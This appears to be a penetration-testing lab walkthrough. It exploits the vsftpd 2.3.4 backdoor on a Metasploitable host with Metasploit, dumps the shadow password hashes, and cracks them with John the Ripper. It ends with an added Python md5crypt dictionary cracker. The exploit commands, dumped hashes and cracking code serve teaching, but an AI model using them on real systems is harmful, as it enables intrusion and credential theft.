Scanning the vsftpd version with MSF

msfconsole
msf6> use auxiliary/scanner/ftp/ftp_version
msf6> show options #to show options 
msf6> set RHOSTS 192.168.56.2 
msf6> run

[+] 192.168.56.2:21       - FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] 192.168.56.2:21       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Searching for a vulnerability in this version

> searchsploit vsftp

---------------------------------------------------- ---------------------------------
 Exploit Title                                      |  Path
---------------------------------------------------- ---------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory  | linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of  | windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of  | windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service                    | linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution           | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasplo | unix/remote/17491.rb
vsftpd 3.0.3 - Remote Denial of Service             | multiple/remote/49719.py
---------------------------------------------------- ---------------------------------
Shellcodes: No Results

Exploiting the vulnerability

We can check whether MSF already ships an exploit module for this vulnerability:

msf6> grep vsftp search exploits

1671  exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution

MSF exploit

So we can use exploit/unix/ftp/vsftpd_234_backdoor to exploit the vulnerability.

msf6> use exploit/unix/ftp/vsftpd_234_backdoor
msf6> show options #to show options 
msf6> set RHOSTS 192.168.56.2 
msf6> run

[*] 192.168.56.2:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.56.2:21 - USER: 331 Please specify the password.
[+] 192.168.56.2:21 - Backdoor service has been spawned, handling...
[+] 192.168.56.2:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > [*] Command shell session 1 opened (192.168.56.3:33065 -> 192.168.56.2:6200) at 2023-01-04 07:38:53 -0500

Despite the "Exploit completed, but no session was created" line, the backdoor shell on port 6200 connects a moment later and MSF wraps it as session 1. To interact with that session:

msf6> sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               192.168.56.3:33065 -> 192.168.56.2:6200 (192.168.56.2)
msf6> sessions -i 1

[*] Starting interaction with 1...

pwd
/

Extracting users and password hashes

The post/linux/gather/hashdump module reads /etc/passwd and /etc/shadow through the session (possible here because the backdoor shell runs as root), unshadows them and stores the files under ~/.msf4/loot. The session reports its platform as "unix" rather than the "linux" the module is written for, hence the warning below, but the module runs regardless, as the output shows.

msf6> use post/linux/gather/hashdump
msf6> set SESSION 1
msf6> run

[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: unix

[+] root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:0:0:root:/root:/bin/bash
[+] sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh
[+] klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false
[+] msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
[+] postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
[+] user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash
[+] service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash
[+] Unshadowed Password File: /home/kali/.msf4/loot/20230104075351_default_192.168.56.2_linux.hashes_013830.txt
[*] Post module execution completed
msf6> loot

Loot
====

host          service  type                  name                   content     info                            path
----          -------  ----                  ----                   -------     ----                            ----
192.168.56.2           linux.passwd          passwd.tx              text/plain  Linux Passwd File               /home/kali/.msf4/loot/20230104082357_default_192.168.56.2_linux.passwd_260206.txt
192.168.56.2           linux.shadow          shadow.tx              text/plain  Linux Password Shadow File      /home/kali/.msf4/loot/20230104082358_default_192.168.56.2_linux.shadow_248549.txt
192.168.56.2           linux.passwd.history  opasswd.tx             text/plain  Linux Passwd History File       /home/kali/.msf4/loot/20230104082400_default_192.168.56.2_linux.passwd.his_714613.txt
192.168.56.2           linux.hashes          unshadowed_passwd.pwd  text/plain  Linux Unshadowed Password File  /home/kali/.msf4/loot/20230104082401_default_192.168.56.2_linux.hashes_593258.txt

Brute force

John first runs its single-crack mode (candidates derived from the login name and GECOS field, which is why user, postgres, msfadmin and service fall immediately) and then the default wordlist /usr/share/john/password.lst:

┌──(kali㉿kali)-[~]
└─$ john /home/kali/.msf4/loot/20230104082401_default_192.168.56.2_linux.hashes_593258.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 7 password hashes with 7 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
user             (user)
postgres         (postgres)
msfadmin         (msfadmin)
service          (service)
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
123456789        (klog)
batman           (sys)
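To see what John is doing with the unshadowed loot file above, here is the same work done by hand: the crypt(3) md5crypt ($1$) scheme implemented in pure Python, a verifier for one hash field, and a small dictionary attack over one passwd line that, like John's single mode, tries the login name before the wordlist. This is an added example, not code from the page or from John. The two passwd lines are copied from the hashdump output above; the wordlist is constructed for the example. Python's own crypt module is deprecated (removed in 3.13), which is why the algorithm is written out rather than imported.

```python
"""md5crypt ($1$) verification and a dictionary attack on unshadowed lines.

Added example, not from the page or from John.  Implements the crypt(3)
md5crypt scheme (Poul-Henning Kamp's FreeBSD design) with hashlib only.
"""
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> str:
    """crypt(3) base-64: emit `count` chars, least-significant 6 bits first."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def md5crypt(password: str, salt: str) -> str:
    """Return the $1$salt$digest string for password (1000-round salted MD5)."""
    pw = password.encode()
    sp = salt[:8].encode()                 # at most 8 salt characters are used
    magic = b"$1$"

    ctx = hashlib.md5(pw + magic + sp)
    alt = hashlib.md5(pw + sp + pw).digest()
    pl = len(pw)
    while pl > 0:                          # mix in len(pw) bytes of the alt digest
        ctx.update(alt[:min(16, pl)])
        pl -= 16
    i = len(pw)
    while i:                               # one byte per bit of len(pw)
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()

    for i in range(1000):                  # the stretching loop john has to repeat
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(sp)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()

    f = final                              # bytes are interleaved before encoding
    digest = (_to64((f[0] << 16) | (f[6] << 8) | f[12], 4)
              + _to64((f[1] << 16) | (f[7] << 8) | f[13], 4)
              + _to64((f[2] << 16) | (f[8] << 8) | f[14], 4)
              + _to64((f[3] << 16) | (f[9] << 8) | f[15], 4)
              + _to64((f[4] << 16) | (f[10] << 8) | f[5], 4)
              + _to64(f[11], 2))
    return "$1$" + sp.decode() + "$" + digest


def verify(candidate: str, hash_field: str) -> bool:
    """True if candidate hashes to hash_field (a $1$salt$digest string)."""
    parts = hash_field.split("$")          # ["", "1", salt, digest]
    if len(parts) != 4 or parts[1] != "1":
        raise ValueError("not an md5crypt ($1$) hash")
    return hmac.compare_digest(md5crypt(candidate, parts[2]), hash_field)


def crack(passwd_line: str, wordlist):
    """Dictionary attack on one unshadowed passwd line; returns the password or None.
    Like John's single mode, the login name itself is tried before the wordlist."""
    user, hash_field = passwd_line.split(":", 2)[:2]
    for candidate in [user, *wordlist]:
        if verify(candidate, hash_field):
            return candidate
    return None


# Lines copied from the unshadowed loot file above (Metasploitable 2 accounts)
USER_LINE = "user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash"
SYS_LINE = "sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh"
# Constructed wordlist for the example (stands in for password.lst)
WORDLIST = ["123456", "password", "letmein", "batman", "qwerty"]

if __name__ == "__main__":
    for line in (USER_LINE, SYS_LINE):
        print(line.split(":")[0], "->", crack(line, WORDLIST))
```

The 1000-round loop is the only thing slowing an attacker down, and 1000 MD5 rounds is cheap on modern hardware, which is why John gets through the whole Metasploitable set in seconds; the same lines with sha512crypt or yescrypt hashes would cost orders of magnitude more per candidate.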